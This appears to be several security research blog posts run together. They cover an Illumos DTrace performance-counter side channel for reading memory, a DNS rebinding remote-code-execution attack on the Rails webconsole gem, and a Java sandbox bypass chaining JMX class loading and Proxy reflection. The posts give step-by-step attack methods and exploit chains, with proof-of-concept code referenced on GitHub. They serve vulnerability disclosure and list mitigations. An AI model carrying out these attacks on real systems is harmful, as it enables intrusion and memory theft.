There doesn’t seem to be any way to observe the result in regs[rd] before it is clobbered when dtrace_canload fails. All of this data is only visible to the current thread and not accessible globally. However, Illumos provides access to the hardware performance counters and allows you to set them to trace while in the kernel only.

It is possible to set DTRACEOPT_STRSIZE to an arbitrary value. So if strsize is set to 1 then only one byte will be checked against the search value supplied to the strchr function. This effectively means the strchr function is checking if the byte at an address is a specific value. The number of instructions or branches taken will be different depending on whether the byte at the address is null, the byte at the address matches or the byte at the address is different.

If we set the performance counter to be PAPI_br_ins (Branch instructions taken) on my machine it will take 645 for a correct value and 646 for an incorrect value. Also, it will always take 645 for a zero value. So by iterating through the byte values (1-255) and calling strchr on each it is possible to read an arbitrary byte.

There is some noise which I suspect is caused by paging which can cause higher values but if you discard any result that does not match 646 or 645 and try again then this works out.

There is also a weird extra branch taken for some addresses. I believe this is because of the toxic range check. The toxic range check is done by addr > START && addr < END so depending on whether addr > START or not there will be a difference in the number of branches taken. (We ignore addr < END` because we don’t try to read from toxic ranges.) This read is not ambiguous because the extra branch translates to either every byte not matching (all 646) or one byte not matching (646) and all the other bytes having an unknown result (647).

Again we plug this vulnerability into our exploit framework and dump memory from arbitrary processes in other zones. :)

POC Code on Github

Rails Webconsole DNS Rebinding

The webconsole gem which ships with the Rails development server allows remote code execution via DNS Rebinding. I reported this issue to Rails on April 20th 2015. However, it may have been reported to them earlier because Homakov also found the issue independently and tweeted about it here:

Since this issue is semi-public I think it is better that the problem is made public before waiting for a fix that may never appear. It also important to note that many developer set ups are probably not vulnerable because they are using Pow to run Rails applications or their upstream DNS servers apply DNS rebinding protection.

The problem is same origin policy in browsers is broken for IP based security unless the server checks the Host header is what it expects it to be. And it looks like rails development mode does not do any checking of the Host header to see that the header is 127.0.0.1 or localhost.

The attack looks something like this:

  1. Attacker tricks user into going to a website they control. For example reallycoolflashgame.com (nothing looks suspicious..)
  2. Attacker opens an iframe to sdjhskdf87.reallycoolflashgame.com:3000 (SOP policy is based on the port number and we open this in an iframe so we don’t tip off the user that something suspicious is going on)
  3. sdjhskdf87.reallycoolflashgame.com is a DNS record with a really short TTL. For example 60 seconds. Attacker then changes the DNS record to point from their IP address to 127.0.0.1
  4. The original html page at sdjhskdf87.reallycoolflashgame.com:3000 starts making XHR requests after the TTL has expired. These requests get routed to the rails app and they can trigger the debug functionality remotely.

I have a website that simulates this attack. If you visit this website on OSX and it starts the Calculator.app then you are definitely vulnerable. However, if it does not work then that might be because the attack is buggy and is not proof that you don’t have a vulnerable setup.

  1. create a new rails project with rails new demo
  2. cd demo; rails server
  3. go to http://www.dnsrebinder.net/ in your browser
  4. You will have to wait about 60-80 seconds and if you are running OSX it will pop a calculator. If you are running something else it won’t do anything useful :(. You can monitor what is happening in Chrome Developer tools. If you see a request that generates a 404 this is evidence that the DNS rebinding was successful.

It might not work if your router or upstream DNS provider is filtering private ip ranges in DNS lookups. So you might have to set your DNS server to point to 8.8.8.8 (google DNS).

Mitigations

  1. Remove webconsole gem from your Gemfile.
  2. Use pow.cx which hosts your Rails application under the .dev domain namespace and do not spawn Rails applications using the ‘rails server’ command.
  3. Use a DNS server that applies DNS rebinding filtering. It is important that it filters 127.0.0.0/8 and the IPV6 local addresses. In particular Rails5 Puma only binds to the IPV6 local address under OSX.

Update

The same vulnerability effect the better errors gem. Thanks to @mikeycgto for the pointer.

ZDI-13-XXX (2013) Java Sandbox Bypass (1.7.0_10) / (1.6.0_38) via Proxy and JMX

This is part of a series of posts detailing Java Sandbox Bypasses that were disclosed between 2012-2013. You can view the other bugs by going back to the original post.

The last two vulnerabilities I wrote up ( ZDI-13-246, ZDI-13-075) involved heap spraying so were not 100% reliable. Most of my sandbox bypasses against the JVM did not use memory corruption or heap spraying so were 100% reliable. These reliable sandbox bypasses fell into two main categories:

First there were vulnerabilites that would try to create a chain from privileged code to a ‘dangerous’ function without touching any user frames. Java uses stack walking to decide whether a dangerous function (System.setSecurityManager(null), Runtime.execute) is allowed to proceed so if you could create a chain then you could subvert the protection.

Second there were vulnerabilities that got access to methods in the ‘protected packages’. After getting access to these packages it is usually trivial to escalate out of the sandbox because it is assumed user code cannot access these methods. Access to these packages usually involved abusing reflection or parts of the JDK that used reflection but did not do so securely. This vulnerability which has existed at least since Java 5 is a good example of abusing reflection to access privileged packages.

This bug is interesting because there is no ZDI public disclosure for it. I suspect this is because Adam Gowdiak disclosed it to Oracle first. Looking back I also suspect I may have sniped this vulnerability from Adam Gowdiak. Gowdiak seems to have a habit of partially publicly disclosing Java bugs before they are fixed. Another bug I disclosed to ZDI, ZDI-13-079 was based on a post he made to the full disclosure mailing list and I definitely sniped this bug from him. I can’t remember the exact details about how I found this bug but I remember Gowdiak made a presentation where he said ‘com.sun.xml.internal.bind.v2.model.nav.Navigator’ was an interesting class. It is possible that I was able to reverse the underlying bug from this.

Vulnerabilies

Three vulnerabilities are used to bypass the sandbox.

  1. Accessing Class instances in protected packages.
  2. Reading fields on interfaces in protected packages.
  3. Getting access to java.lang.reflect.Method for interface methods in protected packages.

Loading Classes in Protected Packages

The JmxMBeanServer class allows you to load classes from protected packages. This isn’t possible in Java 6.

server = JmxMBeanServer.newMBeanServer("", null, null, true);
server.getMBeanInstantiator().findClass(className, (ClassLoader)null);

findClass in MBeanInstantiator ends up calling loadClass(className, null) which will end up performing Class.forName(className).

MBeanInstantiator.loadClasslink
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static Class<?> loadClass(String className, ClassLoader loader)
    throws ReflectionException {

    Class<?> theClass;
    if (className == null) {
        throw new RuntimeOperationsException(new
            IllegalArgumentException("The class name cannot be null"),
                          "Exception occurred during object instantiation");
    }
    try {
        if (loader == null)
            loader = MBeanInstantiator.class.getClassLoader();
        if (loader != null) {
            theClass = Class.forName(className, false, loader);
        } else {
            theClass = Class.forName(className);
        }
    } catch (ClassNotFoundException e) {
        throw new ReflectionException(e,
        "The MBean class could not be loaded");
    }
    return theClass;
}

Reading Fields on Interfaces in Protected Packages

If you call Proxy.getProxyClass(null, new Class[]{targetClass}) then the generated proxy class will have all the fields from the targetClass. Because the generated proxy class is not in a protected package user code can then call proxyClass.getFields() which will give back the java.lang.reflect.Field object and because the field is public call Field#get will succeed. The proxy class successfully loads because it is defined the root class loader.

Getting Access to Method objects for Interface Methods in Protected Packages

This uses a similar vulnerability as above. You can think of the Proxy instance as a machine that will convert Method objects into Method objects for a particular interface. If you look at proxyClass.getDeclaredMethods() for com.sun.xml.internal.bind.v2.model.nav.Navigator you will see something like:

public final boolean $Proxy0.isFinal(java.lang.Object)
public final boolean $Proxy0.isArray(java.lang.Object)
..

If you call $Proxy0.isFinal(java.lang.Object) then it will convert this Method into Navigator.isFinal(java.lang.Object) before passing it to the InvocationHandler.

To access a Method on an interface in a protected package all you have to do is create an InvocationHandler that will save the Method then invoke the corresponding public method on the proxy class.

Once an attacker has access to the Method then they are free to invoke it because the Method is public and no more access checks are performed.

Exploit

  1. We use the JMX class loading vulnerability to load the class "com.sun.xml.internal.bind.v2.model.nav.Navigator".
  2. We then use the field reading vulnerability to read the REFLECTION field from the interface.
  3. We then use the interface method vulnerability to read the getDeclaredMethods(Object o) method from the Navigator class.

Now that we have a way of getting Methods from a protected Class (getDeclaredMethods) and a way of loading protected classes (JMX vulnerability) we can easily subvert the JVM sandbox. There is probably 100 ways of doing this because once you can execute arbitrary static methods in the protected packages it is game over for the JVM. We will use a technique similar to the one disclosed in ZDI-13-159 in order to disable the sandbox except we will modify it slightly so it only uses JDK 6 classes.

  1. We use com.sun.xml.internal.bind.v2.ClassFactory#create(Class) to create a sun.reflect.ReflectionFactory$GetReflectionFactoryAction
  2. We use com.sun.xml.internal.ws.api.server.InstanceResolver#createSingleton to create an InstanceResolver object
  3. We use com.sun.xml.internal.ws.api.server.InstanceResolver#createInvoker to create an Invoker object
  4. We use com.sun.xml.internal.ws.api.server.Invoker#invoke to invoke AccessController#doPrivileged with the PrivilegedAction in step 1 to create a ReflectionFactory object.
  5. We invoke sun.reflect.ReflectionFactory#newField with parameters that correspond to the Statement#acc field
  6. We invoke sun.reflect.ReflectionFactory#newFieldAccessor with the new field object.
  7. We create a Statement object that executes System.setSecurityManager(null);
  8. We invoke sun.reflect.FieldAccessor#set(Object, Object) with a Statement object we have created and a AccessControlContext that gives us all permissions
  9. We execute the Statement which disables the JVM security.

Exploit Java 6

We use the same technique as above but we use the XSLT class loading hack disclosed in ZDI-13-159 to load the classes because this works in Java 6.

Testing (Java 7)

The POC is available from Github

java -Djava.security.manager ProxyAbuse or appletviewer test.html

It will try and print the users home directory and execute an apple script that will say some stuff.

Testing (Java 6)

The POC is available from Github

java -Djava.security.manager Harness or appletviewer test.html

It will try and print the users home directory and execute an apple script that will say some stuff.

Fixes

User code probably shouldn’t be able to load Proxy Classes in the bootstrap class loader.